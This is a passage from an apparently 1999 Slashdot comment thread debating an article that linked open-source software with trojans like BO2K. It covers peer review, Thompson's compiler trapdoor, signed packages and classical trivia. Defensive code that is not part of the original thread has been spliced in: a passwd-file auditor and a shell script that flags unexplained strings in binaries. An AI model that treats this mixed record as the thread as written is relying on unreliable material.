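            entry["gid"] = int(entry["gid"])
        except ValueError:
            errors.append(f"line {lineno}: non-numeric uid/gid")
            continue
        entry["line"] = lineno
        entries.append(entry)
    return entries, errors


def audit_passwd(text):
    """Return a list of human-readable findings (empty means nothing odd)."""
    entries, findings = parse_passwd(text)
    names = Counter(e["name"] for e in entries)
    for e in entries:
        where = f"line {e['line']} ({e['name']})"
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{where}: uid 0 account that is not root")
        if e["passwd"] == "":
            # "x" means the hash lives in /etc/shadow; "" means no password at all.
            findings.append(f"{where}: empty password field (no password required)")
        if names[e["name"]] > 1:
            findings.append(f"{where}: duplicate user name")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

    On a real host the same function can be fed the contents of /etc/passwd; an empty result means none of these particular checks fired, not that the file is clean.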
  80. BOO HOO HOO! by Lumpy · · Score: 1

    Wahhhh, Pooor microslotrh crap is getting attacked!

    Hmm, why don't we hear about linux or Unix virii?
    why can NT be eaten alive by a virii while linux will just fart?

    as long as MS keeps writing crap the virii will proliferate...
    festering and sick bodies harbor disease and virii
    and in the software world it seems to be mimicking the biological world.

    --
    Do not look at laser with remaining good eye.
  81. Quite the opposite... by Stiletto · · Score: 2

    I'd be more concerned about trojan horses in closed-source, proprietary programs, because for the most part they are not subject to the same amount of peer-review as their open-source counterparts.

    1. Re:Quite the opposite... by wiggles · · Score: 2

      Case in point:

      Blizzard Entertainment, during the first week of release for Starcraft for Windows, had the program send a copy of the windows registry (without informing the user) to Blizzard whenever a luser logged on to battle.net to play SC over the internet. I remember a massive stink over that....They claimed that they used the information for "support" purposes. Who knows what they really did? The code was closed source, so you couldn't tell.

      But I don't think this is what that article was saying. It looks like it's talking more about open source hacker tools, and how they can be easily modified quickly.

  82. Re:The real Trojan Horse by dirty · · Score: 1

    It was the greeks, hence the phrase "Beware of greeks bearing gifts."

    --

    -matt
  83. Re:The real Trojan Horse by dirty · · Score: 1

    No, the trojans weren't. I don't remember exactly where Troy was located, but it was a long boat ride from Greece.

    --

    -matt
  84. Re:FUD? by jerodd · · Score: 3
    Actually, the term FUD came about by the CEO of Amdahl when he first started making S/370 clones and IBM used FUD marketing tactics against him (i.e. Amdahl can't build a computer, they only have 25 staff, Amdahl has no support infrastructure, blah blah blah). The CEO of Amdahl thus invented the term FUD (but certainly not the technique, *grin*).

    Cheers,
    Joshua.

    --
    --jon. Postel is dead. May we all mourn his, and our, loss.
  85. OS virii make it easier for Norton and VET by semis · · Score: 1

    I'm just wondering what the people at Norton and VET do when they come across a new virus.

    My guess would be that they reverse-engineer the virus to some sort of pseudo code to determine just exactly how it is working.

    So really, OS virii would be easier to protect against given that the Anti-Virus engineers already have the source to them!

  86. Have you seen the Win98 one?...that's a virus by CE@UIC · · Score: 1

    Micros~1 marketing took over the trojan horsing in Win98. Some stupid stuff about going into the "Time/Time Zone" configuration and clicking and holding on Redmond...blah, blah don't remember the rest. Anyway, instead of a flight sim you get a Micros~1 commercial (sp?)

    1. Re:Have you seen the Win98 one?...that's a virus by Hooloovoo7 · · Score: 1

      The worst thing about this nasty little piece of software is that nearly every computer sold is infected with it - and it actually causes the computer to become more expensive!!!!!!!
      Our wretched species is so made that those who walk on the well-trodden path always throw stones at those who are showing a new road.

  87. Number Two/Virtucom Syndrome by sammy baby · · Score: 1

    The thing about setting up a scam like this is that the investment you put into it winds up making the reward for cashing in on the damn thing almost negligible.

    Take Number Two, from the Austin Powers movies (but especially the first movie). His chief gripe is that he's invested years and years of his life to build up a corporate empire, and Dr. Evil wants to step in and ruin the whole thing by trying to take over the world. It's ludicrous: these are people already rich beyond the dreams of avarice. Why attempt something so risky?

    If a guy creates a company which "builds up its reputation" to the point where it is making a fair amount of money, it becomes increasingly unlikely that he'll try to bilk his customers. He has too much going for him, and there's too much risk.

    (By the way - I seem to recall a post on Bugtraq several months ago which said that Cisco had been caught putting a back door into their router's OS. Amidst a hail of criticism, they issued a patch. It just ain't worth it.)

  88. F - U - D by Geek Boy · · Score: 1

    Fud, fud, fud,
    Which is good, which is bad?
    Fud, fud, fud,
    Ask your mom and ask your dad.

  89. Re:Open-source Trojan Horses by SoftwareJanitor · · Score: 1

    crackers will NOT publish their modifications to the code

    Some will, and some won't. Where would script kiddies be if some crackers didn't publish scripts and how-tos for them? Crackers will publish their modifications, albeit a lot of them will not do so right away. Most of them seem to publish once they have moved on to a newer technique.

  90. You missed the point. by Cacophony · · Score: 1

    I don't know about you guys but what I got from the article is how crackers are implementing open source in their virus creation which makes viruses such as BO2K more dangerous.

    Overall, the article compliments open source by giving the opinion that open source viruses are more dangerous than closed source viruses.

    -Al-
    "There's a bird that nests inside you sleeping underneath your skin. When you open up your wings to speak I wish you'd let me in."

  91. Back doors by Felinoid · · Score: 1

    [When I took a class on running for office they told me to do what I'm about to do]
    The question isn't how do back doors get into the code but how to get them OUT!!!

    True open source means more people can put back doors into code; however, back doors are a tradition of closed source software, and nothing about closed source keeps it from happening.

    Open source however has very few back doors compared to closed source because it is easier to locate and remove back doors when you have the source code. In closed source even if you do discover a back door you can not remove it short of not using the infected program anymore.

    Also open source means you can remove "features" that create security openings you could drive a truck through. Lacking this ability you have to set strange or crazy policies such as discarding any e-mail with file attachments.

    The only way to make sure your code has no back doors is make sure none of the code is written by a programmer.

    --
    I don't actually exist.
  92. Slightly inaccurate by Imperator · · Score: 1

    I don't remember the exact details, but I'm sure it was quite different than you described. IIRC, it affected a version of the beta, and only was activated when you pirated it, and only sent the email address and a few other things, not the whole registry (which is huge).

    -Imperator

    --

    Gates' Law: Every 18 months, the speed of software halves.
    1. Re:Slightly inaccurate by bliss · · Score: 1

      Was anyone prosecuted? If that happened to me I would just get a real good lawyer and look dumb.

      --
      The death of one man is a tragedy; the death of a million is a statistic --Joseph Stalin
  93. Re:The real Trojan Horse by Imperator · · Score: 1

    "Greece" was just an alliance of city-states in what is now the country of Greece. Troy was in Anatolia (aka Asia Minor, now the country of Turkey), and controlled access to the Dardanelles (Greece -> Aegean Sea -> Dardanelles -> Sea of Marmara -> Bosporus -> Black Sea) and thus to the Danube and Persia and a helluva lot of trade. Historically, the Trojan War was about trade, though the excuses given at the time might not have been. Troy was sacked at the end, and not found again until the late 19th century when some guy decided to follow the path described in the Iliad and started digging and found it.

    -Imperator

    --

    Gates' Law: Every 18 months, the speed of software halves.
  94. Dijkstra by AJWM · · Score: 2

    (I always find Dijkstra's 'gotos considered harmful' hilarious. The man is so narrow minded B-)

    You've got to remember that Dijkstra was writing that in an era when most programs were still being written in assembler, COBOL, or FORTRAN IV. Anyone who has had to maintain e.g. a FORTRAN IV program will sympathize with the sentiment.

    Then too, Dijkstra was a Burroughs Fellow, and Burroughs was well known for machines whose "assembly language" was a variant of ALGOL.

    Before I read this I thought all those backdoor stories in Heinlein books or Gibson's stuff were just urban myth

    Not at all. Backdoors were (are?) fairly common to allow access to special or privileged functions for maintenance/debugging (or cracking). My favorite was the phrase "Springhead, this is worker", borrowed from a Firesign Theatre sketch.

    --
    -- Alastair
  95. Re:FUD? by QuMa · · Score: 1

    HELP, I don't know what fud is. Should I know what fud is? Do I really want to know what fud is?

    :-)

    (FUD stands for fear, uncertainty, doubt).

  96. Re:FUD? by QuMa · · Score: 2

    http://www.opensource.org/halloween/

  97. That is the point! by bsletten · · Score: 1

    Isn't that the basic strength of open source? Sure, if you never look at the code, many things could be hidden, but the threat of having millions of code weenies checking it out probably reduces the threat to a non-issue.

    1. Re:That is the point! by bliss · · Score: 1

      Yeah the only time I actually have had root access at all has been at home on my 486.

      --
      The death of one man is a tragedy; the death of a million is a statistic --Joseph Stalin
    2. Re:That is the point! by KrAphtd1nN3r · · Score: 1

      You don't need open-source to do that. You could even modify the administrator's own code, and it would do the same thing. Besides, unless the sysadmin is very crappy, users should never be allowed to write to code files. If they can do so, they probably gained root rights on the system, and putting a trojan in a program is just one of the many ways you can give yourself future access on such a system!!!

      --
      "Code free or die!"
    3. Re:That is the point! by Stonehand · · Score: 1

      Well... I can see one possible aspect -- not so much as related to BO2K, but to open-source programs in general.

      In a workplace or other shared environment, it is quite possible that the staff do not do code audits. If someone were to, say, take the source code of a common program and modify it with some undesirable feature, the fact that the source exists means that the replacement could be made without needing to code up an entire facsimile in existence. That is, to replace, say, "xterm" with a trojan does not require writing an entirely new xterm-like program; trojaning Notepad would. Insertion would still require (ideally) root compromise on a *nix, or persuading a user to run a particular binary; but you've saved yourself work by building on an existing program and its nice, familiar, reassuring interface. *That* wasn't directly mentioned by the article, but seemed to have been implied.

      --
      Only the dead have seen the end of war.
  98. Re:The real Trojan Horse by kmj9907 · · Score: 1
    Would that I hadn't posted anyway, this beauty would be moderated up to 5!

    Don't even worry about the fact that you can only moderate each post by one point. I'd just give Rob a "gift" of some source code to expand /., and voilà, instant unlimited moderation points for all users w/ the name kmj9907. :)

    kmj
    The only reason I keep my ms-dos partition is so I can mount it like the b*tch it is.


  99. Did you people read the article? by kmj9907 · · Score: 3
    It's not saying that a trojan horse will be hidden w/in the code, it's saying that trojan horse programs can cause more trouble if they're open source, due to the fact that variations can be made. It's still a tremendous amount of misguided and misrepresentative FUD though.

    kmj
    The only reason I keep my ms-dos partition is so I can mount it like the b*tch it is.


    1. Re:Did you people read the article? by Zigg · · Score: 1

      Damn straight I read the article. It's a bunch of FUD, plain and simple. I can't believe anyone would take it seriously. Saying that open-source software can "hide" trojan intentions and then citing an open-source program that clearly has those intentions right up front before you download it is seriously misguided.

  100. Re:there already is! by bliss · · Score: 1

    What could someone have to gain with something of that large scale? How could someone just risk getting legal action taken against them and being thrown in prison? Somehow I can't see Linus as being a criminal.

    --
    The death of one man is a tragedy; the death of a million is a statistic --Joseph Stalin
  101. Re:possibly misinterpreted (virii) by bliss · · Score: 1

    As I mentioned in an earlier post I thought virii were cool as well with all the info that the asm gives. It really is quite nice. Well eventually I found linux and achieved nirvana but that is another day's worth of stories.

    --
    The death of one man is a tragedy; the death of a million is a statistic --Joseph Stalin
  102. Re:What they really mean... by bliss · · Score: 1

    I think equating the use of such things as su to compromise security is totally pointless. Even though, look at just HOW secure NT is. NT only meets the lowest level of the DoD's trusted network certification criteria anyway so it's really not the best thing.

    --
    The death of one man is a tragedy; the death of a million is a statistic --Joseph Stalin
  103. Why Bother? by tomreagan · · Score: 2

    Why do we bother even responding to these articles? Anyone with half a brain can see that their arguments make no sense and that this is just incredibly stupid analysis.

    Personally, I think we would all be well served to just leave articles like this alone and not waste our breath on them.

  104. Um.. NO by Crutcher · · Score: 1

    The Real Trojan Horse was left outside TROY, they were at war with some Italians.
    -Crutcher

    --

    -- Crutcher --
    #include <disclaimer.h>
  105. [humor] Re:M$ and open source propaganda by ninoles · · Score: 1

    I'm pretty sure MS backs cDc. Isn't it just another c00l product that only runs on MS systems? ;)

    --
    Fabien Ninoles -- Debian GNU/Linux Developer
    1. Re:[humor] Re:M$ and open source propaganda by Raving Lunatic · · Score: 1

      ...Probably, and much in the same way that Hussein is probably on the CIA's payroll...

  106. Regarding the English language. by TheDullBlade · · Score: 1

    There is no fixed authority for the English language; once a term becomes commonly used it becomes part of the language (for any meaningful definition of those terms).

    I bristle at (and object to) words being used in such a way that changes or even reverses the meanings in older writings (a particularly painful example is the use of "literally" to add emphasis to a metaphor, as in "we literally slaughtered the other team"), but there's nothing to be gained by whining over superficial changes like some pathetic grammar teacher who still thinks "whom" is a part of modern English.

    "Viruses" sounds awkward to many; "virus" logically belongs in that set of Latin-origin irregular nouns with "octopus" and "locus". The "i" ending is certainly more easily distinguished in speech and saves keystrokes.

    This is not to say that I use "virii", or that it is universally preferred, but it is in the running, so don't go "correcting" people.

    --
    /.
  107. Missing the point of BO2K by KevinRemhof · · Score: 2

    This article has a very interesting slant. It seems to regard the cDc as a legitimate software company. Just because they say that BO2K is a remote admin tool, doesn't mean that's what it is for.

    Open Source is not the problem here. Open Source can help with problems like Trojan horses. The problem is those people who intend to use this software for breaking into NT machines. No NT Admin is going to download this thinking that he's going to administrate his network better with this. There are plenty of other tools out there that can do that.

    cDc has developed a potentially malicious tool if used for its proper intent. No one should see it as anything else.

    1. Re:Missing the point of BO2K by FunOne · · Score: 1

      What ISN'T a potentially malicious tool?? I can't find anything that couldn't be used for evil.

      CDC has released a remote admin tool, they're doing everything in their power so it won't be seen as a trojan. It has more features than the remote admin tools from Micros~1 & Norton. [Except this one is free]

      Both the remote admin tools from Micros~1 & Norton can do invisible installs and hide themselves from the user.

      FunOne

      --
      FunOne
  108. Re:The real Trojan Horse by methuseleh · · Score: 4
    So, the article is saying, essentially:
    "Beware of GEEKS bearing gifts"

    Sorry ;)

    --
    Think Green... Burn only 100% recycled dinosaurs in you car.

  109. Since when do crackers respect the law? by IntelliTubbie · · Score: 1

    >>The problem with BO2K being 'open-source' is that
    >>crackers will NOT publish their modifications to
    >>the code.

    >What do you mean, they won't publish their
    >modifications? They have to, according to the
    >license, or else they're breaking the law!

    1) They're only breaking the law if the license is the GPL or something similar - not all licenses require you to publish your changes

    2) So what if they break the law? Aren't they doing that anyway by cracking an NT system? That's like saying a burglar wouldn't break a window to get into a house because that's vandalism!

    --

    Power corrupts. PowerPoint corrupts absolutely.

    1. Re:Since when do crackers respect the law? by Adam Knapp · · Score: 1

      If they don't, he'll tear them a GNU Back Orifice.

    2. Re:Since when do crackers respect the law? by mal3 · · Score: 1

      BO2K is GPL'd. You think RMS will make them call it GNU BO2K? ;-)

      --
      Non gratis rodentus anus
  110. Open-source Trojan Horses by IntelliTubbie · · Score: 2

    To start, one thing needs to be clarified: This article has nothing to do with Linux or the open-source community, per se. Peer-reviewed open source programs (e.g. anything with the GPL) undergo great scrutiny by a virtual army of developers to ensure that the software IS secure.

    The problem with BO2K being "open-source" is that crackers will NOT publish their modifications to the code. This will allow BO2K to potentially fragment into several mutated versions, each slightly different from the next. This makes it more difficult to detect and guard against all variations of BO2K, since crackers might be able to make small modifications to the software that would allow it to slip by security software undetected.

    --

    Power corrupts. PowerPoint corrupts absolutely.

  111. Amusing... by Aqualung · · Score: 1

    I find it rather interesting that the article chooses to focus on the fact that OSS also improves the speed and facility with which viruses are developed... and yet fails to mention that the same viruses, and all 'mutations' thereof, would quickly cease to be effective against an OSS operating system. Just my $0.02

    - Dave

    "Take what thou hast and give it to the poor."

  112. Re:The real Trojan Horse by remande · · Score: 3
    Or, to look at the other end,

    Beware goddesses bearing apples.

    --

    --The basis of all love is respect

  113. Re:The real Trojan Horse by The Welcome Rain · · Score: 1

    Should have been: "Beware of gifts bearing Greeks." :)

    --
    Some keywords for the NSA in the Lord of the Rings universe: One Ring bind find Sauron quest Nazgul freedom
  114. Viruses have always been open source. by Restil · · Score: 1

    First, BO2K isn't a virus.

    Secondly, viruses have always been open sourced. Most of them were coded directly in assembly language to keep them small, while macro viruses and such are much more complex than the old style viruses. Back in the day, viruses were rarely more than about 50-100 bytes in size, yet they were just as dangerous. There never existed any commented C++ code, and the assembly code could easily be displayed on a page of paper.

    -Restil

    --
    Play with my webcams and lights here
  115. Don't see the issue. by Restil · · Score: 2

    The article basically just complains about the motives of cDc and the fact that the open source nature of the program will make it difficult for antivirus software to detect different strains and will allow other "malicious" coders a head start.
    However, the article doesn't really discuss anything about dangers to the open source movement itself, and I don't really see these dangers either.

    Ok, so somebody writes their own copy of, let's say, telnetd with a built in trojan horse. Well, this has already been done before, just download a rootkit from rootshell.org if you want it. Nothing new.

    Of course, if this trojan was to make it into an official distribution it would have to get by several pairs of eyes first. Say I found some clever way to insert a trojan horse into the kernel itself. In order for it to make it into the official kernel release, Linus himself would have to approve the code (or some other competent coder would). Since not just ANY code is blindly inserted into the kernel, I seriously doubt this would work.

    Most other open source is handled in the same way. There's always someone who reviews changes before it gets into the primary release, and even if that person was sleeping that day, eventually someone would discover it, and the coder would be exposed. I just don't see it as a problem.

    -Restil

    --
    Play with my webcams and lights here
  116. Re:FUD, Microsoft's Influence, and What am I going by jfunk · · Score: 2

    I've played around with BO2k already. Great tool for remote admin - in a market where other packages cost an arm and a leg. If the AV companies all delete the hell out of BO2k, I'm not going to be able to use it, because I'm thinking I will rely on both. (the upcoming plugins for bo2k will help in software distribution GREATLY.) what should I do? I don't know enough C/++ whatever to modify what the signature would be - maybe some tips?


    I'm interested in BO2K for the same reasons as you. I use VNC all the time to fix the bi-daily problem with my brother's 98 machine. I also connect to my machine from work and school to check mail, read documentation, etc.

    Frankly, I don't see the security risk. Putting BO2K on my brother's computer is no different than putting VNC or PC-Anywhere on it.

    I'll try out BO2K when there is a *NIX client. My favourite VNC feature is the Java client so that I can use it within a browser without having to download stuff.

    As for your AV problem, I suggest you find out what your AV software does (or will do) regarding BO2K. I think nothing is appropriate. This is a tool, and anybody who is scared of it is, well, not very computer-literate. According to the site, there is no known way to detect it running on a remote machine. That's a good thing. There's obviously no backdoor, or we'd all know about it now.

    Any AV company who discriminates against BO2K needs a stern talking to. Imagine if AV software automatically deleted Linux partitions from your HD. It's a similar situation, discriminating against OSS alternatives to proprietary software. On my computer at school, the previous user turned on the AV features and password protected it (I would have fixed that, but I haven't rebooted it in months, and don't care to). It detects in the boot sector, oh my god, a VIRUS!!! Sorry, only LILO. Imagine the new user who installs Linux only to get this message, thinking it's real.

    That can't be good.

  117. ummm, no by / · · Score: 1

    The Trojans were the ones who accepted the gift (from the Greeks).

    --
    "If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
  118. A question? by Nassah the Protoss · · Score: 1

    Can PGP help diminish that threat?

    I understand there is never any real security whenever you are connected using any kind of software GNU, MS, SUN, SCO.........

    PGP signed tarballs, rpms...., by the maintainer or the distro like RedHat, Debian, Suse.....

    --
    Kill Microsoft? No! Just hire their GUI guys!
  119. Re:The real Trojan Horse by Adam+Knapp · · Score: 1

    Just to be picky, the Trojan Horse was left outside of Troy by the Greeks. The horse was a holy animal to the Trojans and so they took the wooden horse as a sign from the Greeks that the war was over. Unfortunately for the Trojans, Odysseus (Ulysses to the Romans) and his men were hidden inside the statue and when night fell, they opened the city gates and that's what made the Trojans lose the Trojan war.

  120. Am I missing the Linux API call... by ??? · · Score: 1

    Am I missing the API call that allows me to remotely spawn a thread in _another_process_, in fact a _system_process_, thus evading detection? This is something that is at issue here. It is significantly more difficult under *NIX to hide yourself from someone who knows what he/she is doing. I can see that vnc, telnetd, or sshd is running. Once I see that it is running, I can terminate it, and take measures to ensure that the attack is not repeated.

  121. Wait ... the horse was not left *by* the Trojans! by timothy · · Score: 1

    IIRC, the horse was left by the attacking / besieging (Spartan?) army. The soldiers exited the horse at night, unlocked the gates, and the attackers sacked Troy. Right?

    Not that the basic message / metaphor is lost, of course.

    I'm sure someone will correct me if this is wrong;)

    timothy

    --
    jrnl: http://tinyurl.com/c2l8yr / foes: http://tinyurl.com/ckjno5
  122. there already is! by EnderWiggnz · · Score: 2

    you see... the open source community is the security verification group. when one of the Xmillion number of linux users says "hey, i can hack this using only 4 lines of code", the open source community springs into action, and says.... oh... ok, here's the patch....

    The appearance of a trojan is nil, as everyone could see the backdoor in plain view, and close it, and then flame the heck out of whoever tried to put it in.

    Security by Obscurity does not work. Just look at NT... or MacOS-X...

    --
    ... hi bingo ...
  123. "BO2K can be hidden, therefore is evil..." by The+Silicon+Sorceror · · Score: 1

    Both Microsoft and the fools that published this article base their derogatory comments about BO2K on the fact that it can be hidden from the user. For example, here is a quote from Microsoft:

    "Remote control software is not malicious in and of itself; in fact, legitimate remote control software packages are available for use by system administrators. What is different about BO2K is that it is intended to be used for malicious purposes, and includes stealth behavior that has no purpose other than to make it difficult to detect."

    For the record, BO2K is a perfectly legitimate remote admin tool. It just happens to be open source. It can be used for malicious purposes just like any other tool.

    Microsoft says that BO2K is a "malicious hacker tool" (sic) because it can be concealed. They conveniently overlook the fact that their remote administration tool, SMS (Systems Management Server) can be concealed just as well.

    On Monday, July 19, Cult of the Dead Cow Communications publicly challenged Microsoft to recall all copies of SMS and to petition virus scanner makers to include signatures for SMS in their products.

    --

    ~ Give me 101 plastic soldiers, and I will conquer the world.
  124. Fud, yes, but there was another point too by arthurs_sidekick · · Score: 1

    One of the worries expressed about "open source" and viruses was that when virus coders use open-source development models, they are able to develop virii faster, to wit:

    When virus writers moved to an open source model in 1996, there was an explosion in macro viruses, ICSA's Thompson said. "I could see how [the proliferation of attacks] might happen [as hackers] borrow bits and pieces of code" from BO2K. "We may see more viruses that exploit" BO2K code, he said.

    Well, two things to say about this: of course the proliferation of macro viruses had nothing to do with the increasing prevalence of computers running all the MS Office apps -- geez! But second, and more important:

    If viruses are developed faster because their makers moved to an "open source" model, then this would seem to provide an argument that anti-viral software should also have an open source model. In fact, the argument assumes that development under the open source model is faster.

    I note, finally, that the article focused on the problems faced by people running NT anyhow.

    --
    "Oh, I hope he doesn't give us halyatchkies," said Heinrich.
  125. Clarification (Was Re:What they really mean...) by jmweeks · · Score: 1

    If my argument involving su, etc. was read as a criticism of unix security, or NT security for that matter, then I apologize for not making myself clear.

    Equating the use of telnet/su (or ssh) to Back Orifice was simply my way of saying that any viable operating system that is capable of the client/server model (basically any machine capable of tcp/ip networking) is in my opinion inherently vulnerable to a program like Back Orifice. To disable this vulnerability would be to disallow root-like privileges to everyone, which is completely absurd, or to set up some sort of networking watchdog construct that is complex beyond my imagining.

    I reiterate that I see the only true hole in NT that bo2k exploits is poor task management (ie inability to see/kill all apps running on the computer easily). I'd also like to note that I do not run it on my own computer (I did for about two months before becoming fed up with it, and turning to the much more rewarding Linux OS). I don't like promoting MS, but I don't like undue criticism when there are areas in which that criticism could be much more responsibly used.

  126. What they really mean... by jmweeks · · Score: 3

    A rather misinformed and misleading article such as this really means when starting an article with "Trojan horse programs concealed inside open source code" is "Look at me!" In other words, a poorly masked use of attention-getting buzzwords with little knowledge of their meaning or proper use.

    Is the bo2k open source? Apparently. Will that help its proliferation? Probably, although as far as I have read it is made to be particularly evasive in the first place. Does this have any relevance to the common usage of the term "open source" and the people who will be drawn to read the article based upon its use of this term? Of course not.

    To make matters worse, and to muddy the waters to a point obvious to anyone reading the proliferation of comments on this topic, this article refers to bo2k as a trojan horse. This is completely and totally untrue and misleading. A trojan horse is a program that embeds itself in another, allowing itself to be executed (usually unnoticed) when the enclosing program is run. Such a practice is devious and obviously viral and totally unlike this program.

    Back Orifice's server is an executable program that runs in and of itself. It does so very quietly and (due to, in my opinion, an oversight on Microsoft's development) is difficult to detect. It is a server program, an application, and in no way a trojan horse.

    The reason this has muddied the waters, at least at slashdot, is that the image of a trojan horse in open source software (in other words, offending source code placed unnoticed in trusted source code) provokes most open source advocates to bring up the issue of peer review's ability to eliminate such 'trojan horses.' These arguments, though accurate, are completely irrelevant when one considers that there are not trojan horses (either in source code or executable form) involved.

    But the article did what was intended: It provoked many of us to read it that would not have otherwise. Congrats.

    Oh, and as a side note: I have seen it mentioned many times that Back Orifice exploits security risks in Windows operating systems. Basically, this is untrue. I am not a Microsoft fan by any stretch of the term, but I find it hard to fathom people considering a server program, run with the equivalent of root privileges, as exploiting security risks if it can actually control a system. Telnetting (or more wisely ssh'ing) in to a unix box of any variety that I know and su -'ing allows anyone with knowledge of the root password the ability to control basically any aspect of the system in question. The two security holes that this exploits are the inadequate task management of Windows OS's and the overuse of administration-level accounts in doing user-level operations. Oh, and the execution of untrustworthy applications, which can not (except perhaps in the case of macros) be blamed on MS.

  127. Humor Re:The real Trojan Horse by lildogie · · Score: 1

    "greeks bearing gifts" is the cliche, but I always thought it played better the other way around.

  128. FUUUDDDDDDDDDDDDDD by Nahuel+Greco · · Score: 0

    Dear boys,

    this is the clearest example of an article with fud inside bought by microsoft.

    the writer will be shot.

    the objective is that the idiots do the relation:

    BO2K -> OpenSource -> All Opensource software have trojans inside

    cDc is and was a great group for script kiddies and adolescent idiots

  129. Security through obscurity... by dsaxena · · Score: 2

    ...blah blah blah.

    Yes, OSS makes it easy for disgruntled people to get trojan code into a program, but there are several ways to deal with this.

    • Only download code from trusted sources. This means that you only get the latest gnome patches from the gnome website or from official mirrors. If you follow this
    • In addition to this, use PGP/GPG signatures to validate what you are getting against the official distribution. If you download an official distribution of a package, it is safe to assume that patches have been looked at by several sets of eyes to ensure that they are OK before they were added to the code base.

    There is a misconception by IT suits that there is a complete lack of change control in Open Source projects. The people where I work had this misconception that I could do a search for "linux device foobar2000x drivers" and would find hundreds of different patches. IMHO, Open Source projects are one of the best examples of change control as maintainers sift through many different patches before deciding which ones are worth applying.


    Deepak Saxena
    Project Director, Linux Demo Day '99

    --
    Deepak Saxena
    "Computers are useless, they can only give you answers" - Picasso
  130. Gnu BO2K by Ungrounded+Lightning · · Score: 1

    > BO2K is GPL'd. You think RMS will make them call it GNU BO2K? ;-)

    Why not?

    BO2K is really a powerful remote-console/administration tool (that "just happens" to have a number of optimizations for clandestine use. B-b ) If you're using it OFFICIALLY it can be as useful to you as an UNOFFICIAL install is to a cracker.

    In fact, your copy can be useless to a cracker, because the source already has customizable security hooks to keep others from using BO2K trapdoor servers they didn't install themselves. (They'll have to sucker you or your users to install their own copy.)

    Check out http://www.hlz.nl/bo2k/bo2k.ra for details.

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  131. Thompson's trojan virus, and why not to sweat it. by Ungrounded+Lightning · · Score: 3

    The hack was in the C compiler. It consisted of two parts:

    - If the compiler recognized that it was compiling the login program, it expanded a canned macro that added a trapdoor - a canned login and password that gave root access.

    - If the compiler recognized that it was compiling itself, it expanded a canned macro that added the recognize-and-expand-canned-macros code, along with the macros, to the new copy of the compiler.

    You only have to compile this in once, after which you can throw out the patch and it propagates to later versions of the compiler. BUT:

    - It only lives in compilers.

    - It only works as long as they're being compiled by themselves, in a never-ending stream. It will NOT propagate to a new compiler implementation, such as making the hop from PCC to gnu, or being installed in a new version of PCC that was compiled by gnu rather than PCC. (In principle you could build one that recognized TWO or more compilers and could hop back and forth, though that makes it twice as fragile.)

    - It will die as soon as a change to the compiler source renders the signature unrecognizable.

    - Even if it is alive, it stops inserting trapdoors once the signature of the target program changes.

    Rumor has it that this was actually propagated in the Portable C Compiler {PCC}, and was discovered and cleaned out when the guys at Berkeley wrote strings, and wondered why the compiler had the string "login".

    Note that this is MUCH easier to do with a proprietary compiler than an open one. Gcc, for instance, is shipped in source, with a build file that lets it be built by just about any C compiler, not just an older gcc. Even if a Thompson trojan virus existed for gcc, it isn't inserted when you compile with another compiler, producing a clean gcc that only has what its own source implies and only emits what the target's source implies. (It's almost as if NONinfection was infectious.)

    So even a security paranoid like myself isn't worried about trojans that aren't there to be spotted in the open source.

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
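    The detection step in the anecdote above (running strings over the compiler and asking why it contains "login") done systematically, as an added example that is not part of this thread or of any project named in it: a POSIX shell script that pulls every printable run out of a binary and looks each one up in the source tree the binary was supposedly built from, printing whatever the source never mentions. The extract_strings helper is built from tr and awk so it does not depend on binutils; paths and the sample data are constructed.

```sh
#!/bin/sh
# Added example (not from the thread): list literals present in a binary that
# appear nowhere in its source tree. A string the source cannot account for is
# exactly the clue that exposed the compiler trapdoor in the anecdote above.
# All paths are hypothetical.

extract_strings() {
    # Printable ASCII runs of at least $2 (default 4) bytes in file $1,
    # like strings(1) but built from tr and awk so it needs no binutils.
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | awk -v min="${2:-4}" 'length($0) >= min'
}

unexpected_literals() {
    # $1 = binary, $2 = source directory. Prints each distinct string from the
    # binary that occurs nowhere in the source tree (fixed-string search, so
    # regex metacharacters in the binary's strings are harmless).
    extract_strings "$1" | sort -u | while IFS= read -r s; do
        grep -rqF -- "$s" "$2" || printf '%s\n' "$s"
    done
}

demo_unexpected_literals() {
    # Constructed data: a one-file "source tree" and a stand-in binary whose
    # bytes mix non-printable filler with two literals, one that the source
    # accounts for ("usage: cc [file]") and one ("login") that it does not.
    workdir=$(mktemp -d)
    mkdir "$workdir/src"
    printf 'const char *usage = "usage: cc [file]";\n' > "$workdir/src/cc.c"
    printf '\177ELF\001\002\003usage: cc [file]\001\002login\003\004' > "$workdir/cc"
    unexpected_literals "$workdir/cc" "$workdir/src"
    rm -r -- "$workdir"
}

demo_unexpected_literals
```

    On a real compiler the list is never empty: the toolchain and libc contribute symbol names, version banners and section names that the project's own source does not contain. The useful comparison is therefore against a baseline build of the same source made with a second, independent compiler, which is the same reasoning the post gives for building gcc with something other than an older gcc.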
  132. BO2K beneficial to MS by factotum · · Score: 1

    I think we're all overlooking the fact that the open source model of BO2K will actually greatly facilitate the job of MS programmers by pointing out security flaws. MS should be thanking the BO crew, in some strange and possibly perverted way. I do not condone the creation and use of tools that are intended to compromise security of any system, but if that's what it takes to make NT secure, then so be it.

    It is true that the open source model of BO2K will allow similar programmes to be written that will avoid detection simply because they are different from BO2K, but the security exploits are still the same. If the security holes are patched there will be nothing to fear from the OSS model.

    Strange how interpretation can erase the otherwise clear distinction between fact and fiction.

  133. Stupid Moderators by Hooloovoo7 · · Score: 1

    I don't see how this is off topic. The point is that M$, which is quite probably thrilled about this article, is using OSS software on one of their most popular services. Apache, mod_ssl, and SSLeay are all open source, and I'm sure Micro$oft will:
    • Never get NT working under the load that Hotmail endures
    • Never deny that Hotmail is secure
    The fact that they use Solaris shows that they still need a company to sue (why else would they use SMS products ;), but they obviously trust OSS.

    --
    Our wretched species is so made that those who walk on the well-trodden path always throw stones at those who are showing a new road.
  134. Re:FUD? by FreeYourSoftware · · Score: 1

    This is stupid, but I thought it was Fscked Up Disinformation at first... Made sense in the context.

  135. Two Articles for the Price of One! by iad · · Score: 1

